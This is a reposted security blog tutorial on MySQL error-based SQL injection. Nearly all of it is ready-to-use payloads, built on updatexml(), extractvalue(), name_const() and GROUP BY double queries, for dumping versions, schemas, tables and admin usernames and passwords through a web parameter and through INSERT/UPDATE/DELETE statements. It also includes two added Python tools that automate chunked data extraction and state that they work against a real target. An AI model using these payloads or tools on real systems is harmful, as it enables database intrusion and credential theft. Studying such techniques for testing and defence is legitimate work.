Thoughts on updatexml() injection prompted by a comprehensive penetration challenge

    MySQL updatexml() error-based injection
    UPDATEXML(XML_document, XPath_string, new_value);
    First argument: XML_document, a string naming the XML document object (Doc in this article).
    Second argument: XPath_string, a string in XPath format; if you are unfamiliar with XPath syntax, tutorials are easy to find online.
    Third argument: new_value, a string that replaces the data matched by the XPath expression.


    Dump the database version
    http://www.hackblog.cn/sql.php?id=1 and updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1)
    Connected user
    http://www.hackblog.cn/sql.php?id=1 and updatexml(1,concat(0x7e,(SELECT user()),0x7e),1)
    Current database
    http://www.hackblog.cn/sql.php?id=1 and updatexml(1,concat(0x7e,(SELECT database()),0x7e),1)
    Dump databases
    http://www.hackblog.cn/sql.php?id=1 and updatexml(1,concat(0x7e,(SELECT schema_name FROM information_schema.schemata limit 0,1),0x7e),1)
    Dump tables
    http://www.hackblog.cn/sql.php?id=1 and updatexml(1,concat(0x7e,(SELECT table_name FROM information_schema.tables WHERE table_schema=database() limit 0,1),0x7e),1)
    Dump columns
    http://www.hackblog.cn/sql.php?id=1 and updatexml(1,concat(0x7e,(SELECT column_name FROM information_schema.columns WHERE table_name='admin' limit 0,1),0x7e),1)
    Dump column contents
    http://www.hackblog.cn/sql.php?id=1 and updatexml(1,concat(0x7e,(SELECT distinct concat(0x23,username,0x3a,password,0x23) FROM admin limit 0,1),0x7e),1)
    Step through the remaining rows by raising the limit offset (limit 1,1, limit 2,1, ...).


    concat() returns the string formed by joining its arguments. If any argument is NULL the whole result is NULL, so a NULL column silently empties the leaked string; wrap such columns in ifnull() when dumping.


    Querying @@version returns the version, and concat() turns it into a string such as ~5.7.42~. Because the second argument of updatexml() must be a valid XPath expression and ~ is not legal XPath, the call fails with an XPATH syntax error whose message quotes the offending string, and that quoted string is what leaks the value. The 0x7e marker exists precisely to guarantee the error and to delimit the data. The error message keeps only the first 32 characters of the expression, so longer results have to be read out in pieces with substr().

    0x1 Prerequisites

      a. A MySQL database

      b. Create the database and table used in the experiments

    CREATE DATABASE newdb;
    USE newdb;
    CREATE TABLE users
    (
    id int(3) NOT NULL AUTO_INCREMENT,
    username varchar(20) NOT NULL,
    password varchar(20) NOT NULL,
    PRIMARY KEY (id)
    );

    0x2 Using the updatexml() function
    1. Injection

    a. Payload format: or updatexml(1,concat(0x7e,(version())),0) or

    b. INSERT injection: INSERT INTO users (id, username, password) VALUES (2,'Pseudo_Z' or updatexml(1,concat(0x7e,(version())),0) or'', 'security-eng');

    c. UPDATE injection: UPDATE users SET password='security-eng' or updatexml(2,concat(0x7e,(version())),0) or'' WHERE id=2 and username='Pseudo_Z';

    d. DELETE injection: DELETE FROM users WHERE id=2 or updatexml(1,concat(0x7e,(version())),0) or'';

    The first and third arguments of updatexml() are irrelevant; the error fires while the second is parsed, which is why c. can pass 2 as the first argument.


    2. Extracting data

      a. Payload format:

      or updatexml(0,concat(0x7e,(SELECT concat(table_name) FROM information_schema.tables WHERE table_schema=database() limit 0,1)),0) or

      b. INSERT, extracting table names:

    INSERT INTO users (id, username, password) VALUES (2,'r00tgrok' or updatexml(0,concat(0x7e,(SELECT concat(table_name) FROM information_schema.tables WHERE table_schema=database() limit 0,1)),0) or '', 'ohmygod_is_r00tgrok');

      c. INSERT, extracting column names:

    INSERT INTO users (id, username, password) VALUES (2,'r00tgrok' or updatexml(0,concat(0x7e,(SELECT concat(column_name) FROM information_schema.columns WHERE table_name='users' limit 0,1)),0) or '', 'ohmygod_is_r00tgrok');

      d. Dump via INSERT:

    INSERT INTO users (id, username, password) VALUES (2,'r00tgrok' or updatexml(0,concat(0x7e,(SELECT concat_ws(':',id, username, password) FROM users limit 0,1)),0) or '', 'ohmygod_is_r00tgrok');

      e. Dump via DELETE:

      DELETE FROM users WHERE id=1 or updatexml(0,concat(0x7e,(SELECT concat_ws(':',id, username, password) FROM users limit 0,1)),0) or '';

      f. Dump via UPDATE?

      The table being updated cannot be dumped through that same UPDATE, but a different table can (a second table, students, is assumed here):

      UPDATE students SET name='Nicky' or updatexml(1,concat(0x7e,(SELECT concat_ws(':',id, username, password) FROM newdb.users limit 0,1)),0) or'' WHERE id=1;


    3. Tips

      a. The statement errors out, and the error message carries the information we wanted to extract.

      b. Running the code from the author's paper on MySQL 5.6.19, the earlier extractions succeed but the later dumps fail with: [Err] 1093 - You can't specify target table 'users' for update in FROM clause

      c. Googling it turns up two references:

      case 1:

       // failing code
       DELETE FROM table_name WHERE column_name IN (SELECT column_name FROM table_name WHERE column_name > 10);

       // corrected code
       DELETE FROM table_name WHERE column_name IN (SELECT * FROM (SELECT column_name FROM table_name WHERE column_name > 10) AS X);

       // explanation: rows cannot be deleted from the same data source that a subquery in the statement reads from; the same applies to UPDATE

      case 2:

    CREATE TABLE comments(id int primary key, phrase text, uid int);
    INSERT INTO comments VALUES (1, 'admin user comments', 1),
                                (2, 'HR User Comments', 2),
                                (3, 'RH User Comments', 2);
    UPDATE comments SET phrase = (SELECT phrase FROM comments WHERE uid=2 AND id=2) WHERE id = 3;   -- fails with error 1093

      Fixed code:

    UPDATE comments SET phrase = (SELECT phrase FROM (SELECT * FROM comments) AS c1 WHERE c1.uid=2 AND c1.id=2) WHERE id = 3;

      Explanation: MySQL does not allow UPDATE or DELETE on a table while a subquery in the same statement reads from it. MySQL materialises a subquery in the FROM clause as a temporary table; wrapping the subquery one level deeper inside a FROM clause forces it to be executed and stored in that temporary table first, which the outer query then references implicitly. The same wrapping makes the dump payloads in 2.d to 2.f work against the table being written to: replace (SELECT ... FROM users limit 0,1) with (SELECT * FROM (SELECT ... FROM users limit 0,1) AS x). The LIMIT inside the inner query also stops newer optimizers from merging the derived table back into the outer statement.
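The two practical problems met so far, the 32-character cap on what an XPATH syntax error can carry (sections 0x2 and 0x3) and error 1093 when the dump reads the table the injected statement writes to (tip 3), can be handled by one small client. The Python below is an added example and is not code from the original post or from the paper it refers to. The `send` callback, the payload shapes and the 31-character window are assumptions made for this example, and `fake_backend` is a constructed stand-in so the code runs without a MySQL server.

```python
import re

# MySQL turns an invalid XPath expression into
#   ERROR 1105 (HY000): XPATH syntax error: '~5.7.42-log'
# and keeps only the first 32 characters of the offending expression in the
# message, so anything longer has to be paged out with substr().
XPATH_ERR = re.compile(r"XPATH syntax error: '~(.*)'$")
CHUNK = 31  # 32-character budget minus the leading '~' marker


def leaked_value(error_message):
    """Return the text smuggled into an XPATH syntax error, or None when the
    response is some other error (for instance error 1093)."""
    m = XPATH_ERR.search(error_message or "")
    return m.group(1) if m else None


def wrap_derived(subquery, alias="x"):
    """Hide a subquery behind a derived table so a dump from the table that an
    UPDATE/DELETE/INSERT targets does not trip error 1093 (tip 3 workaround)."""
    return f"(SELECT * FROM ({subquery}) AS {alias})"


def chunk_payload(expr, offset, func="updatexml", same_table=False):
    """One error-based payload leaking CHUNK characters of `expr` from the
    1-based `offset`. `expr` is a scalar SELECT such as "SELECT user()"; set
    same_table=True when the injected statement already writes to the table
    that `expr` reads from."""
    source = wrap_derived(expr) if same_table else f"({expr})"
    window = f"substr({source},{offset},{CHUNK})"
    if func == "updatexml":
        return f" or updatexml(1,concat(0x7e,{window}),0) or ''"
    if func == "extractvalue":
        return f" or extractvalue(1,concat(0x7e,{window})) or ''"
    raise ValueError(f"unknown error channel: {func}")


def dump_value(expr, send, **kw):
    """Page through `expr` with `send(payload) -> error message text` until a
    chunk shorter than CHUNK comes back. Returns None if the channel never
    answered with an XPATH error."""
    out, offset = "", 1
    while True:
        chunk = leaked_value(send(chunk_payload(expr, offset, **kw)))
        if chunk is None:
            return None
        out += chunk
        if len(chunk) < CHUNK:
            return out
        offset += CHUNK


def fake_backend(secret):
    """Constructed stand-in for the vulnerable endpoint: it honours only the
    substr() window of the payload and truncates the message like the server."""
    win = re.compile(r"substr\(.*?,(\d+),(\d+)\)")

    def send(payload):
        m = win.search(payload)
        start, length = int(m.group(1)), int(m.group(2))
        piece = secret[start - 1:start - 1 + length]
        return "XPATH syntax error: '" + ("~" + piece)[:32] + "'"

    return send


if __name__ == "__main__":
    backend = fake_backend("root@localhost:5.7.42-0ubuntu0.18.04.1-log")  # constructed value
    print(dump_value("SELECT concat(user(),0x3a,@@version)", backend))
    print(chunk_payload("SELECT concat_ws(':',id,username,password) FROM users limit 0,1",
                        1, func="extractvalue", same_table=True))
```

Against a real target, `send` would issue the request and return the error text from the response body; everything else stays the same. The end-of-value test relies on a short final chunk, so a value whose length is an exact multiple of 31 costs one extra request that returns an empty chunk.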


    4. updatexml() [returns the XML fragment with the replacement applied] is one of MySQL's XML functions; the other is extractvalue() [extracts a value from an XML string using XPath notation], which is used below.

      e.g.   SET @xml = '<a><b>X</b><b>Y</b></a>';
             SET @i = 1, @j = 2;
             SELECT @i, ExtractValue(@xml, '//b[$@i]');

      // ExtractValue(xml_frag, xpath_expr)   // UpdateXML(xml_target, xpath_expr, new_xml)

      MySQL's XPath support has many limitations: node-set comparisons and functions such as string() are not supported. XPath injection resembles SQL injection, with slightly different syntax.


     


    0x3 Using the extractvalue() function

      a. Payload format: or extractvalue(1,concat(0x7e,database())) or

      b. Injection:

       INSERT INTO users (id, username, password) VALUES (2,'r00tgrok' or extractvalue(1,concat(0x7e,database())) or'', 'Pseudo_Z');

       UPDATE users SET password='Nicky' or extractvalue(1,concat(0x7e,database())) or'' WHERE id=2 and username='Pseudo_Z';

       DELETE FROM users WHERE id=1 or extractvalue(1,concat(0x7e,database())) or'';

      c. Extracting data:

    INSERT INTO users (id, username, password) VALUES (2,'r00tgrok' or extractvalue(1,concat(0x7e,(SELECT concat(table_name) FROM information_schema.tables WHERE table_schema=database() limit 0,1))) or'', 'balabala');

      Dumps and the UPDATE/DELETE variants work exactly as shown above for updatexml(), including the derived-table wrap when the dump reads the table being written.

    0x4 Using name_const() // introduced in 5.0.13, returns any given value

      a. Payload format: or (SELECT*FROM(SELECT(name_const(version(),1)),name_const(version(),1))a) or

      The derived table ends up with two columns both named after the value, so MySQL fails with error 1060 "Duplicate column name '<value>'", which leaks it. Note that name_const() requires constant arguments; on releases that enforce this, version() and subqueries are rejected with "Incorrect arguments to NAME_CONST" instead of the duplicate-column error, so treat this channel as version-dependent.

      b. Injection:

    UPDATE users SET password='Nicky' or (SELECT*FROM(SELECT(name_const(version(),1)),name_const(version(),1))a) or '' WHERE id=2 and username='Pseudo_Z';

      c. Extracting data:

    INSERT INTO users (id, username, password) VALUES (1,'admin' or (SELECT*FROM(SELECT name_const((SELECT table_name FROM information_schema.tables WHERE table_schema=database() limit 0,1),1),name_const((SELECT table_name FROM information_schema.tables WHERE table_schema=database() limit 0,1),1))a) or '', 'oyyoug0d');


    0x5 Double-query injection // MySQL has no "double query" as such, so a subquery is used

    The GROUP BY on concat(value, floor(rand(0)*2)) produces a duplicate group key, and the resulting error 1062 "Duplicate entry '...' for key 'group_key'" carries the value. The table in the FROM clause must have at least three rows, which information_schema.columns always has.

    1. Injection

    INSERT INTO users (id, username, password) VALUES (1,'r00tgrok' or (SELECT 1 FROM(SELECT count(*),concat((SELECT (SELECT concat(0x7e,0x27,cast(database() as char),0x27,0x7e)) FROM information_schema.tables limit 0,1),floor(rand(0)*2))x FROM information_schema.columns group by x)a) or'', 'Bl4ckhat');

    DELETE FROM users WHERE id=1 or (SELECT 1 FROM(SELECT count(*),concat((SELECT (SELECT concat(0x7e,0x27,cast(database() as char),0x27,0x7e)) FROM information_schema.tables limit 0,1),floor(rand(0)*2))x FROM information_schema.columns group by x)a)or'';

    2. Extracting data

    INSERT INTO users (id, username, password) VALUES (1, 'Pseudo_Z' or (SELECT 1 FROM(SELECT count(*),concat((SELECT (SELECT (SELECT concat(0x7e,0x27,cast(users.username as char),0x27,0x7e) FROM `newdb`.users LIMIT 0,1) ) FROM information_schema.tables limit 0,1),floor(rand(0)*2))x FROM information_schema.columns group by x)a) or '', 'jesus-2014');
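Added example, not from the original post: the two remaining error channels on this page (0x4 name_const() and 0x5 the GROUP BY double query) built as payloads and parsed back into values, plus a small model of why the floor(rand(0)*2) trick needs three rows. The error-message formats, the commonly cited rand(0) prefix and the simplified GROUP BY temporary-table model are assumptions of this example rather than statements from the post.

```python
import re

# Error texts the two channels produce (formats assumed from MySQL client output):
#   name_const():      ERROR 1060 (42S21): Duplicate column name '5.7.42-log'
#   floor(rand(0)*2):  ERROR 1062 (23000): Duplicate entry '~'newdb'~1' for key 'group_key'
DUP_COLUMN = re.compile(r"Duplicate column name '(.*)'$")
DUP_ENTRY = re.compile(r"Duplicate entry '(.*)' for key '<?group_key>?'$")

# Commonly cited prefix of floor(rand(0)*2) in MySQL; the fixed seed makes it repeatable.
RAND0_PREFIX = [0, 1, 1, 0, 1, 1, 1, 0, 0, 1, 1]


def name_const_payload(expr):
    """Derived table whose two columns are both named after the value of `expr`,
    so the statement dies with error 1060 carrying that value."""
    col = f"name_const({expr},1)"
    return f" or (SELECT * FROM (SELECT {col},{col}) a) or ''"


def group_by_payload(expr):
    """Double-query payload in the page's shape: GROUP BY on concat(~'value'~, floor(rand(0)*2)).
    information_schema.columns is the row source because the trick needs at least 3 rows."""
    marked = f"concat(0x7e,0x27,cast(({expr}) as char),0x27,0x7e)"
    return (" or (SELECT 1 FROM (SELECT count(*),concat("
            f"(SELECT {marked} FROM information_schema.tables limit 0,1),"
            "floor(rand(0)*2))x FROM information_schema.columns GROUP BY x)a) or ''")


def simulate_group_by(value, row_count, rand=RAND0_PREFIX):
    """Simplified model of MySQL's GROUP BY temporary table: the key is evaluated
    once to look the row up and evaluated again when the row has to be inserted;
    with rand() inside the key the second value can already be present.
    Returns the error text, or None when the query would simply succeed."""
    draws = iter(rand)
    table = {}
    for _ in range(row_count):
        lookup = f"~'{value}'~{next(draws)}"
        if lookup in table:
            table[lookup] += 1
            continue
        insert = f"~'{value}'~{next(draws)}"
        if insert in table:
            return f"Duplicate entry '{insert}' for key 'group_key'"
        table[insert] = 1
    return None


def leaked_from_error(error_message):
    """Map an error text back to (channel, value); None if it is neither channel."""
    m = DUP_COLUMN.search(error_message or "")
    if m:
        return ("name_const", m.group(1))
    m = DUP_ENTRY.search(error_message or "")
    if m:
        key = m.group(1)
        # drop the floor(rand(0)*2) digit and the ~'...'~ markers the payload added
        inner = re.fullmatch(r"~'(.*)'~[01]", key)
        return ("group_by", inner.group(1) if inner else key)
    return None


if __name__ == "__main__":
    print(name_const_payload("version()"))
    print(group_by_payload("database()"))
    for rows in (1, 2, 3):
        print(rows, "row(s):", simulate_group_by("newdb", rows))
```

With the cited prefix 0,1,1,0,... the first row is looked up under key 0 and stored under key 1, the second row is found under key 1, and the third is looked up under 0 again but inserted under 1, which already exists; that is the collision the payload relies on, and why a single- or two-row table never triggers it.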


    0x6 Other variants

    ' or (payload) or '
    ' and (payload) and '
    ' or (payload) and '
    ' or (payload) and '='
    '* (payload) *'
    " – (payload) – "

    References:

    https://bbs.ichunqiu.com/thread-1953-1-1.html     ichunqiu comprehensive penetration challenge

    http://www.mamicode.com/info-detail-1665678.html

    http://www.freebuf.com/author/%E6%BC%8F%E6%96%97%E7%A4%BE%E5%8C%BA?page=3     FreeBuf 漏斗社区 author page

    http://www.freebuf.com/column/161797.html     modifying sqlmap payloads

    http://www.freebuf.com/column/145988.html     ORDER BY injection
    ————————————————
    Copyright notice: this article is original work by CSDN blogger "Wh0ale", released under the CC 4.0 BY-SA license; reposts must include the original source link and this notice.
    Original link: https://blog.csdn.net/m0_37438418/article/details/80260813

    Reposted from: https://www.cnblogs.com/0daybug/p/12334495.html